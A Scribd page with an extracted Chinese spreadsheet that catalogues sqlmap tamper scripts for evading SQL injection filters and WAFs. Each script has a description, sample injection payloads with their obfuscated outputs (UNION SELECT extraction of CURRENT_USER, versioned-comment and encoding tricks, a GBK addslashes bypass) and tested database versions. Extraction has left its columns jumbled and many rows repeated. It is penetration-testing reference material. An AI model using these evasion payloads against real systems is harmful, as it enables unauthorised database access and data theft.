Scribd
Upload
24 views20 pages

Sqlmap绕过过滤的 Tamper 脚本分类汇总

The document provides a comprehensive list of supported databases and their corresponding identifiers, including MSSQL, MySQL, Oracle, and PostgreSQL. It also details various tamper scripts used to bypass SQL injection filters, explaining their functions and the database types they are compatible with. Additionally, it includes examples of SQL queries and their tampered outputs for different database systems.

Uploaded by

spe3ter
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as XLSX, PDF, TXT or read online on Scribd
24 views20 pages

Sqlmap绕过过滤的 Tamper 脚本分类汇总

The document provides a comprehensive list of supported databases and their corresponding identifiers, including MSSQL, MySQL, Oracle, and PostgreSQL. It also details various tamper scripts used to bypass SQL injection filters, explaining their functions and the database types they are compatible with. Additionally, it includes examples of SQL queries and their tampered outputs for different database systems.

Uploaded by

spe3ter
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as XLSX, PDF, TXT or read online on Scribd
You are on page 1/ 20

sq

支持的数据库 编号

ALL
5

MSSQL
MSSQL 6

10

11

MYSQL 1

8
9

10

11

12

13

14

15

16

17

18
19

* MySQL < 5.1

20

21

MySQL >= 5.1.


1

Oracle
5

6
7

PostgreSQL 5

Microsoft Access 1

其他
sqlmap绕过过滤的tamper脚本分类汇总
脚本名称 作用

apostrophemask.py 用utf8代替引号

base64encode.py 用base64编码替换

multiplespaces.py 围绕SQL关键字添加多个空格

space2plus.py 用+替换空格

双重查询语句。取代predefined SQL关键字with表示
nonrecursivereplacement.py suitable for替代(例如 .replace(“SELECT”、”"))
filters

代替空格字符(“”)从一个随机的空
space2randomblank.py
白字符可选字符的有效集

unionalltounion.py 替换UNION ALL SELECT UNION SELECT

securesphere.py 追加特制的字符串

绕过过滤‘=’ 替换空格字符(”),(’ – ‘)后跟一个破折号注释,一个随机字


space2hash.py
符串和一个新行(’ n’)

equaltolike.py like 代替等号

space2mssqlblank.py(mssql)
空格替换为其它空符号

space2mssqlhash.py
替换空格

between.py 用between替换大于号(>)
percentage.py asp允许每个字符前面添加一个%号

sp_password.py 追加sp_password’从DBMS日志的自动模糊处理的有效载荷的末尾

charencode.py url编码

randomcase.py 随机大小写

charunicodeencode.py 字符串 unicode 编码

Replaces space character (‘ ‘) with


space2comment.py
comments ‘/**/’

equaltolike.py like 代替等号

greatest.py 绕过过滤’>’ ,用GREATEST替换大于号。

apostrophenullencode.py 绕过过滤双引号,替换字符和双引号。

绕过对 IFNULL 过滤。


ifnull2ifisnull.py
替换类似’IFNULL(A, B)’为’IF(ISNULL(A), B, A)’

space2mssqlhash.py 替换空格

modsecurityversioned.py 过滤空格,包含完整的查询版本注释

space2mysqlblank.py 空格替换其它空白符号(mysql)

between.py 用between替换大于号(>)
modsecurityzeroversioned.py 包含了完整的查询与零版本注释

space2mysqldash.py 替换空格字符(”)(’ – ‘)后跟一个破折号注释一个新行(’ n’)

代替空格字符后与一个有效的随机空白字符的SQL语句。
bluecoat.py
然后替换=为like

percentage.py asp允许每个字符前面添加一个%号

charencode.py url编码

randomcase.py 随机大小写

Encloses each non-function keyword with


versionedkeywords.py
versioned MySQL comment

space2comment.py Replaces space character (‘ ‘) with comments ‘/

charunicodeencode.py 字符串 unicode 编码

versionedmorekeywords.py 注释绕过
halfversionedmorekeywords.py 关键字前加注释

当数据库为mysql时绕过防火墙,每个关键字之前添加
halfversionedmorekeywords.py
mysql版本评论

space2morehash.py 空格替换为 #号 以及更多随机字符串 换行符

greatest.py 绕过过滤’>’ ,用GREATEST替换大于号。

apostrophenullencode.py 绕过过滤双引号,替换字符和双引号。

between.py 用between替换大于号(>)

charencode.py url编码

randomcase.py 随机大小写

charunicodeencode.py 字符串 unicode 编码


space2comment.py Replaces space character (‘ ‘) with comments

greatest.py 绕过过滤’>’ ,用GREATEST替换大于号。

apostrophenullencode.py 绕过过滤双引号,替换字符和双引号。

between.py
用between替换大于号(>)

percentage.py

asp允许每个字符前面添加一个%号

charencode.py
url编码

randomcase.py
随机大小写

charunicodeencode.py

字符串 unicode 编码

space2comment.py
Replaces space character (‘ ‘) with
comments ‘/**/’

appendnullbyte.py 在有效负荷结束位置加载零字节字符编码

chardoubleencode.py 双url编码(不处理以编码的)

unmagicquotes.py 宽字符绕过 GPC addslashes

randomcomments.py 用/**/分割sql关键字
amper脚本分类汇总
实现方式 测试通过的数据库类型和版本
("1 AND '1'='1")
'1 AND %EF%BC%871%EF%BC%87=%EF%BC%871'

("1' AND SLEEP(5)#")


'MScgQU5EIFNMRUVQKDUpIw=='

('1 UNION SELECT foobar')


'1 UNION SELECT foobar'

('SELECT id FROM users')


'SELECT+id+FROM+users'

('1 UNION SELECT 2--')


'1 UNIOUNIONN SELESELECTCT 2--'

('SELECT id FROM users')


'SELECT%0Did%0DFROM%0Ausers'

('-1 UNION ALL SELECT')


'-1 UNION SELECT'

('1 AND 1=1')


"1 AND 1=1 and '0having'='0having'"

'1 AND 9227=9227'


'1--nVNaVoPYeva%0AAND--ngNvzqu
%0A9227=9227'

* Input: SELECT * FROM users WHERE id=1


2 * Output: SELECT * FROM users WHERE id LIKE 1

Input: SELECT id FROM users


Output: SELECT%08id%02FROM%0Fusers * Microsoft SQL Server 2000
* Microsoft SQL Server 2005
('1 AND 9227=9227')
'1%23%0AAND%23%0A9227=9227'

('1 AND A > B--')


'1 AND A NOT BETWEEN 0 AND B--'
* Input: SELECT FIELD FROM TABLE
* Output: %S%E%L%E%C%T %F%I%E%L%D %F%R
%O%M %T%A%B%L%E

('1 AND 9227=9227-- ')


'1 AND 9227=9227-- sp_password'

* Input: SELECT FIELD FROM%20TABLE


* Output: %53%45%4c
%45%43%54%20%46%49%45%4c
%44%20%46%52%4f%4d%20%54%41%42%4c%45
* Input: INSERT
* Output: InsERt

* Input: SELECT FIELD%20FROM TABLE


* Output: %u0053%u0045%u004c
%u0045%u0043%u0054%u0020%u0046%u0049%u
0045%u004c
%u0044%u0020%u0046%u0052%u004f%u004d
%u0020%u0054%u0041%u0042%u004c%u0045′
* Input: SELECT id FROM users
* Output: SELECT//id//FROM/**/users

Microsoft SQL Server 2005


* Input: SELECT * FROM users WHERE id=1
2 * Output: SELECT * FROM users WHERE id LIKE 1
MySQL 4, 5.0 and 5.5

('1 AND A > B') * MySQL 4, 5.0 and 5.5


'1 AND GREATEST(A,B+1)=A' * Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0
tamper("1 AND '1'='1")
* MySQL 4, 5.0 and 5.5
* Oracle 10g
'1 AND %00%271%00%27=%00%271'
* PostgreSQL 8.3, 8.4, 9.0

('IFNULL(1, 2)')
'IF(ISNULL(1),2,1)' * MySQL 5.0 and 5.5

('1 AND 9227=9227')


'1%23%0AAND%23%0A9227=9227'

('1 AND 2>1--')


'1 /*!30874AND 2>1*/--'

* MySQL 5.0
Input: SELECT id FROM users
Output: SELECT%0Bid%0BFROM%A0users
* MySQL 5.1
* Microsoft SQL Server 2005
('1 AND A > B--')
* MySQL 4, 5.0 and 5.5
'1 AND A NOT BETWEEN 0 AND B--'
* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0
('1 AND 2>1--')
'1 /*!00000AND 2>1*/--'

* MySQL 5.0
('1 AND 9227=9227')
'1--%0AAND--%0A9227=9227'

('SELECT id FROM users where id = 1')


'SELECT%09id FROM users where id LIKE 1'
* MySQL 5.1, SGOS
* Input: SELECT FIELD FROM TABLE
* Output: %S%E%L%E%C%T %F%I%E%L%D %F%R
%O%M %T%A%B%L%E * Microsoft SQL Server 2000, 2005
* MySQL 5.1.56, 5.5.11
* PostgreSQL 9.0
* Input: SELECT FIELD FROM%20TABLE * Microsoft SQL Server 2005
* Output: %53%45%4c * MySQL 4, 5.0 and 5.5
%45%43%54%20%46%49%45%4c * Oracle 10g
%44%20%46%52%4f%4d%20%54%41%42%4c%45 * PostgreSQL 8.3, 8.4, 9.0
* Microsoft SQL Server 2005
* Input: INSERT
* MySQL 4, 5.0 and 5.5
* Output: InsERt
* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0

* Input: 1 UNION ALL SELECT NULL, NULL,


CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CU
RRENT_USER() AS
CHAR),CHAR(32)),CHAR(58,100,114,117,58))#
* Output: 1/*!UNION**!ALL**!SELECT**!NULL*/,/*!
NULL*/,
CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CU
RRENT_USER()/*!AS**!
CHAR*/),CHAR(32)),CHAR(58,100,114,117,58))#

* Microsoft SQL Server 2005


* Input: SELECT id FROM users
* MySQL 4, 5.0 and 5.5
* Output: SELECT//id//FROM/**/users
* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0
* Input: SELECT FIELD%20FROM TABLE
* Output: %u0053%u0045%u004c
%u0045%u0043%u0054%u0020%u0046%u0049%u * Microsoft SQL Server 2000
0045%u004c * Microsoft SQL Server 2005
%u0044%u0020%u0046%u0052%u004f%u004d * MySQL 5.1.56
%u0020%u0054%u0041%u0042%u004c%u0045′ * PostgreSQL 9.0.3

* Input: 1 UNION ALL SELECT NULL, NULL,


CONCAT(CHAR(58,122,114,115,58),IFNULL(CAST(CU
RRENT_USER() AS
CHAR),CHAR(32)),CHAR(58,115,114,121,58))#
* Output: 1/*!UNION**!ALL**!SELECT**!NULL*/,/*!
NULL*/,/*!CONCAT*/(/*!CHAR*/(58,122,114,115,58),/
*!IFNULL*/(CAST(/*!CURRENT_USER*/()/*!AS**!
CHAR*/),/*!CHAR*/(32)),/*!CHAR*/
(58,115,114,121,58))#
* Input: value’ UNION ALL SELECT
CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CU
RRENT_USER() AS
CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL,
NULL# AND ‘QDWa’='QDWa
* Output: value’/*!0UNION/*!0ALL/*!0SELECT/*!
0CONCAT(/*!0CHAR(58,107,112,113,58),/*!
0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!
0CHAR),/*!0CHAR(32)),/*!
0CHAR(58,97,110,121,58)), NULL, NULL#/*!0AND
‘QDWa’='QDWa * MySQL 4.0.18, 5.0.22
1.("value' UNION ALL SELECT
CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CU
RRENT_USER() AS
CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL,
NULL# AND 'QDWa'='QDWa")
* MySQL 4.0.18, 5.0.22
2."value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/
*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!
0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/
*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!
0AND 'QDWa'='QDWa"

* Input: 1 AND 9227=9227


* Output: 1%23PTTmJopxdWJ%0AAND%23cWfcVRPV
%0A9227=9227
MySQL 5.1.41
('1 AND A > B') * MySQL 4, 5.0 and 5.5
'1 AND GREATEST(A,B+1)=A' * Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0
tamper("1 AND '1'='1")
* MySQL 4, 5.0 and 5.5
'1 AND %00%271%00%27=%00%271' * Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0
* Microsoft SQL Server 2005
('1 AND A > B--')
* MySQL 4, 5.0 and 5.5
'1 AND A NOT BETWEEN 0 AND B--'
* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0
* Input: SELECT FIELD FROM%20TABLE * Microsoft SQL Server 2005
* Output: %53%45%4c * MySQL 4, 5.0 and 5.5
%45%43%54%20%46%49%45%4c * Oracle 10g
%44%20%46%52%4f%4d%20%54%41%42%4c%45 * PostgreSQL 8.3, 8.4, 9.0
* Microsoft SQL Server 2005
* Input: INSERT
* MySQL 4, 5.0 and 5.5
* Output: InsERt
* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0
* Input: SELECT FIELD%20FROM TABLE
* Output: %u0053%u0045%u004c
%u0045%u0043%u0054%u0020%u0046%u0049%u * Microsoft SQL Server 2000
0045%u004c * Microsoft SQL Server 2005
%u0044%u0020%u0046%u0052%u004f%u004d * MySQL 5.1.56
%u0020%u0054%u0041%u0042%u004c%u0045′ * PostgreSQL 9.0.3
* Microsoft SQL Server 2005
* Input: SELECT id FROM users
* MySQL 4, 5.0 and 5.5
* Output: SELECT//id//FROM/**/users
* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0
('1 AND A > B') * MySQL 4, 5.0 and 5.5
'1 AND GREATEST(A,B+1)=A' * Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0
tamper("1 AND '1'='1")
* MySQL 4, 5.0 and 5.5
'1 AND %00%271%00%27=%00%271' * Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0
* Microsoft SQL Server 2005
('1 AND A > B--')
* MySQL 4, 5.0 and 5.5
'1 AND A NOT BETWEEN 0 AND B--'
* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0
* Input: SELECT FIELD FROM TABLE
* Output: %S%E%L%E%C%T %F%I%E%L%D %F%R
%O%M %T%A%B%L%E * Microsoft SQL Server 2000, 2005
* MySQL 5.1.56, 5.5.11
* PostgreSQL 9.0
* Input: SELECT FIELD FROM%20TABLE * Microsoft SQL Server 2005
* Output: %53%45%4c * MySQL 4, 5.0 and 5.5
%45%43%54%20%46%49%45%4c * Oracle 10g
%44%20%46%52%4f%4d%20%54%41%42%4c%45 * PostgreSQL 8.3, 8.4, 9.0
* Microsoft SQL Server 2005
* Input: INSERT
* MySQL 4, 5.0 and 5.5
* Output: InsERt
* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0
* Input: SELECT FIELD%20FROM TABLE
* Output: %u0053%u0045%u004c
%u0045%u0043%u0054%u0020%u0046%u0049%u * Microsoft SQL Server 2000
0045%u004c * Microsoft SQL Server 2005
%u0044%u0020%u0046%u0052%u004f%u004d * MySQL 5.1.56
%u0020%u0054%u0041%u0042%u004c%u0045′ * PostgreSQL 9.0.3
* Microsoft SQL Server 2005
* Input: SELECT id FROM users
* MySQL 4, 5.0 and 5.5
* Output: SELECT//id//FROM/**/users
* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0
('1 AND 1=1')
'1 AND 1=1%00'

* Input: SELECT FIELD FROM%20TABLE


* Output: %2553%2545%254c
%2545%2543%2554%2520%2546%2549%2545%2
54c%2544%2520%2546%2552%254f%254d
%2520%2554%2541%2542%254c%2545
* Input: 1′ AND 1=1
* Output: 1%bf%27 AND 1=1–%20

‘INSERT’ becomes ‘IN//S//ERT’

You might also like